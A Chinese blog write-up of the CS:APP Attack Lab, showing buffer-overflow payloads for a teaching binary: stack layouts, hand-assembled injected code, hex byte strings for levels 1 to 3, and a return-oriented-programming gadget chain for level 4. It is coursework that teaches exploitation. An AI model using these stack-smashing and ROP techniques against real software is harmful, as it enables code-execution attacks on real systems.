attack lab

最新推荐文章于 2024-05-25 18:58:05 发布
最新推荐文章于 2024-05-25 18:58:05 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: 操作系统实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013129143/article/details/88770738
版权

Level1

在getbuf 设置断点
输入 12345678901234567890
使用 info reg 查看寄存器
在这里插入图片描述
rsp此时指向的内存地址 存储的应该是"1234 5678" 相对应的ascii 应该是
0x31 0x32 0x33 0x34 0x35 0x36 0x37 0x38
使用x /48x $rsp 验证一下
(字符串是顺序存放 如果存放的"12345678"是Int类型 这里内存应该是倒序的)
在这里插入图片描述

然后 $rsp+0x28 应该存的是 返回地址
在这里插入图片描述
即应该是 小端存放 0x76 0x19 0x40 0x00 0x00 0x00 0x00 0x00
在这里插入图片描述
那这一题就很简单了 输入字符串 然后把返回地址替换成touch1()的地址
在这里插入图片描述
就是 0x004017c0 但是要倒序放入 所以是 c0 17 40 00 00 00 00 00
设计的内存布局应该是这样
前面 5行(每行 16个) 无所谓
在这里插入图片描述
然后

./hex2raw <t1> touch1

生成字节码作为输入

./ctarget -qi touch1

在这里插入图片描述

Level 2

思路
1.将需要注入的代码转换成字节码 作为getbuf的输入
2.注入的代码主要是 将cookie 存入rdi作为输入 然后把touch2的执行地址压栈 ret
3.getbuf()的栈帧返回地址改成 注入的代码的 的执行地址 也就是rsp-0x28

注入的代码:
vim 2.s

movq $0x59b997fa,%rdi  //把cookie 存入rdi作为参数传递
pushq $0x004017ec  //touch2的地址压栈
retq

gcc -c 2.s -o 2.o
objdump -d 2.o > 2.out
2.out:
所以 指令的机器码是

48 c7 c7 fa 97 b9 59 	//mov    $0x59b997fa,%rdi
68 ec 17 40 00       	//pushq  $0x4017ec
c3                           //retq

所以需要插入的字节码内存布局应该是这样的

48 c7 c7 fa  97 b9 59 68
ec 17 40 00  c3 00 00 00
00 00 00 00  00 00 00 00
00 00 00 00  00 00 00 00
00 00 00 00  00 00 00 00
78 dc 61 55  00 00 00 00

在这里插入图片描述
然后

  ./hex2raw <2.in> touch2
root@ubuntu-s-2vcpu-4gb-sfo2-01:~/csapp/target1# ./ctarget -qi touch2
Cookie: 0x59b997fa
Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00

level 3

cookie:0x59b997fa 字符串表示就是 35 39 62 39 39 37 66 61 00
思路
就是按level 2的做 ,但是要注意的就是 要保护cookie 的存放的位置.因为 touch3 调用了hexmatch.这个函数会申请较大的空间也就是 rsp会往低地址延申很多.为了保护cookie字符串,所以我把cookie字符串放到了text()函数的栈帧里面.这样无论hexmatch怎么弄都不会影响到text()函数的栈帧(因为无论怎么调用只会让getbuf时的rsp做减法,也就是只会影响比rsp低的地址之后的空间)

3.in

    48 c7 c7 a8  dc 61 55 68
    fa 18 40 00  c3 00 00 00
    00 00 00 00  00 00 00 00
    00 00 00 00  00 00 00 00
    00 00 00 00  00 00 00 00
    78 dc 61 55  00 00 00 00
    35 39 62 39  39 37 66 61
    00 00 00 00  00 00 00 00
    
./hex2raw <3.in> touch3

在这里插入图片描述

level 4

思路:

在这里插入图片描述
所以对于黄色区域 我们直接用0(什么都可以)填充了 让 输入的 溢出到text()的栈帧区域 ,也就可执行的区域,然后不断的通过跳转到这个rtarget可执行的区域.利用这些区域的指令 进行我们要做的事情

在这里插入图片描述
那么可执行区域要怎么设计呢
先搞清楚我们需要使用什么指令完成操作
1.把cookie 放进rdi作为参数传递
2.跳转到touch2
3.ret
代码就是

movq $0x59b997fa,%rdi
pushq $0x4017ec
ret

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
1.先把数字放进某个寄存器.那这就要用到popq了 根据表B,我们需要找到 存有58 -5f 这个范围指令的内存地址,然后后面还得有个c3(retq,用来跳转到下一个)
在这里插入图片描述

58 popq %rax
90 nop
c3 retq

所以我们就确定了第一个执行的地址是 4019a7+4 =4019ab
同时要把cookie放进去 以pop出来
2.把rax 存到 rdi 作为参数
也就是mov $rax ,$rdi 根据表A 我们要找到存放48 89 c7指令的内存地址
在这里插入图片描述
地址是 4019a2
3.touch2的地址 ec 17 40 00
内存布局就是
在这里插入图片描述
要搞明白这个原理 要清晰的知道rsp 和 rip 的变化
retq 约等于 执行了 popq $rip
popq 约等于 执行了 mov $rsp,$ 和 $rsp+8

NIL_
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TCP/IP Attack Lab
(∪.∪ )...zzz的博客
11-10 3924
目录启动环境Task 1.1: Launching the Attack Using PythonTask 1.2: Launch the Attack Using CTask 2: TCP RST Attacks on telnet ConnectionsTask 3: TCP Session HijackingTask 4: Creating Reverse Shell using TCP Session Hijacking 启动环境 Task 1.1: Launching the Attack Us
_Attacklab实验报告.pdf
12-20
本实验通过完成在两个不同安全漏洞的程序上实现五 种攻击,目的就在于:当程序没有对缓冲区溢出做足够防范时,立交 攻击者可能会如何利用这些安全漏洞 ;通过实验,能更好的理解写 出安全的程序的重要性,也能了解到一些编译器和操作 ;以及系统 提供的帮助改善程序安全性的特性。能更深入地理解 x86-64 机器代 码的栈和参数传递机制;能更深入地理解 x86-64 指令的编码方式。 能更熟练地使用调试工具 GDB 和 OBJDUMP。 实验意义:亲自动手体验利用操作系统和网络服务器中安全漏洞 进行攻击的方法,帮助学生学习程序的运行时操作,以及理解这些安 全漏洞的本质,这样以后书写系统代码时能尽量避免这些漏洞。
【SEED LAB】TCP/IP Attack Lab
qq_43599063的博客
07-18 2907
原因这就是SYNcookie机制的作用它在接收到客户端的SYN包时,不立刻为连接分配资源,而是根据SYN包计算一个cookie值作为SYNACK包的初始序列号。此处nc命令的使用是表示在Attacker中开启的是9090端口,也就是相当于启动了一个tcp服务,此服务监听了从9090端口输入进来的内容。这一机制保证了在遭受SYN洪泛攻击时,受害者主机的半开连接队列的资源不会被耗尽,从而能接受观察者主机的正常连接。在Client中由于会话被劫持,已经不能再输入其他的命令了。发现已经无法在其中键入命令。...
AttackLab实验记录
最新发布
zxj9_9_5__9_7的博客
05-25 806
AttackLab实验记录
(SEED-Lab) TCP/IP Attack Lab
lunan的博客
02-17 6770
(SEED-Lab) TCP/IP Attack Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录(SEED-Lab) TCP/IP Attack Lab一、实验目标二、实验原理三、实验过程3.1 Task 1: SYN Flooding Attack3.2 Task 2: TCP RST Attacks on telnet and ssh Connections3.2.2 SSH connection3.3 Task 3: TCP RST Attacks
TCP/IP Attack Lab(SEED实验)
l4kjih3gfe2dcba1的博客
08-26 4001
TCP确实是一个漏洞百出的协议啊。。
【DNS缓存中毒实验】SEED lab:DNS Remote Attack Lab The Kaminsky Attack
04-11
这个实验,"SEED lab:DNS Remote Attack Lab The Kaminsky Attack",旨在让你亲身体验并理解这种攻击方式。 DNS缓存中毒是一种网络安全攻击,攻击者通过篡改DNS服务器的缓存记录,将合法的域名指向错误的IP地址,...
tcpip实验指导书
05-26
根据SEEDLabs–TCP/IP Attack Lab文档,实验将涉及以下几种类型的TCP/IP攻击: 1. **IP欺骗**:通过伪造源IP地址,使目标系统误以为数据包来自可信源,从而实现攻击。 2. **TCP会话劫持**:利用TCP协议中的某些特性...
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
CSAPP lab 5 实验指导书
09-21
In this lab you will be writing a dynamic storage allocator for C programs, i.e., your own version of the malloc and free routines. It is quite involved. Start early! We are providing some extra ...
SeedLab7: Local DNS Attack Lab
Rachel_IS的博客
01-19 3735
这次是三个DNS 好处是配一次环境就行 Local应该是最容易的,因为直接通过嗅探伪造DNS包 Task 1 在resolv.conf.d/head 里写入Server的地址 然后dig试一下,没问题的话返回的SERVER字段就是写入的那个IP (如果看到127.0.0.1,可以把/etc/resolv.conf中其他的server注释掉再试一下 Task 2 跟着教程配,再重启bind 9即可 此时在User主机使用ping,能看到先向DNS服务器获得IP,然后再发送ICMP数据包 第一次查询的
【Seedlabs】Local DNS Attack Lab
seven49的博客
04-07 3518
目录 一、实验概述 二、实验环境 2.1 测试 DNS 设置 三、实验内容 域名解析 Answers 毒化 2、域名解析 NS 毒化 3、kaminsky 攻击 一、实验概述 DNS (Domain Name System) is the Internet’s phone book; it translates hostnames to IP addresses (and vice versa). This translation is through DNS resolution...
Local DNS Attack Lab
koko2015c的博客
02-24 3703
DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RFC 2136对DNS的动态更新进行说明
【信息安全】seed-labs实验-TCP/IP Attack Lab
可乐大牛的博客
12-10 3524
文件删除成功,并且客户端的光标被锁死,无法输入命令(这个是因为客户端的终端失去了正确的ack与seq,既无法发出信息,也无法接收信息,甚至无法退出。在wireshark上可以找到最新的报文信息,最新的是客户端发给服务器的,那我们模拟客户端再发一条,只需要改变序列号就好了。在wireshark上可以找到最新的报文信息,最新的是客户端发给服务器的,那我们模拟客户端再发一条,只需要改变序列号就好了。攻击脚本:py文件(攻击速度慢,因为是虚拟机,半连接会自动重置,要是攻击的速度赶不上重置的速度就实验失败了)
AttackLab3
Yinger_2000的博客
10-29 278
先看看调用hexmatch前后缓冲区、返回地址和返回地址上8个字节的变化(缓冲区40bytes) 在这里前后插入两个断点 然后写了一个checkspace,目的是让test在返回时返回到touch3的地址。 两处断点处栈分别是这样的 说明0x556647d8处可以放我们曲奇饼的地址!(?) 现在开始写汇编代码 根据上图写出攻击字符串的16进制形式,其中最后两行是曲奇饼的ASCII码 ...
【CSAPP】Attacklab 详解
Schriefer的博客
08-16 2924
CSAPP中attacklab的详解
深入理解计算机系统(CSAPP) 实验详解:AttackLab
专业记录代码
11-23 4105
ROP妙处 先复习一下ret的动作 ret时会将当前%rsp指向的值当作地址弹出,使得%rip程序计数器指到该地址的指令处,这个是通用的说法 换一种说法就是,它会直接返回到地址处。 需要注意的地方 指令是指令,栈是栈不要搞混,不管我们指令如何跳,只要不对%rsp进行操作,我们栈指针就是不会改变,ret会间接改变栈指针,因为它有两个动作(先弹出地址给%rip,然后在给%rsp加8)。 明白了上面说的,我们就可以开始讲ROP了 touch2 ---->4 movq %rax
SeedLab6: TCP/IP Attack Lab
Rachel_IS的博客
01-19 3432
针对TCP协议的攻击实验~ 四类攻击: SYN 洪泛攻击 TCP RST攻击 TCP会话劫持 反弹shell 工具:netwox/scapy,实测netwox即可完成 SYN 洪泛攻击 先康康受害者主机半开连接的等待队列有多大: 先关掉SYN cookie机制进行攻击: 指定IP,netwox进行攻击: 能看到受害者主机有大量23号端口的半开连接: 此时如果从观察者主机telnet受害者主机,没有响应直到超时: 再打开SYN cookie进行攻击: 依然有很多很多半开连接: 但这时候从观察者
Buffer-Overflow Attack Lab
12-27
Buffer-Overflow Attack Lab是一个用于学习和实践缓冲区溢出攻击的实验。通过这个实验,你可以更好地理解缓冲区溢出攻击的原理和实现方式,并学习如何保护系统免受此类攻击。 在Buffer-Overflow Attack Lab中,你将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值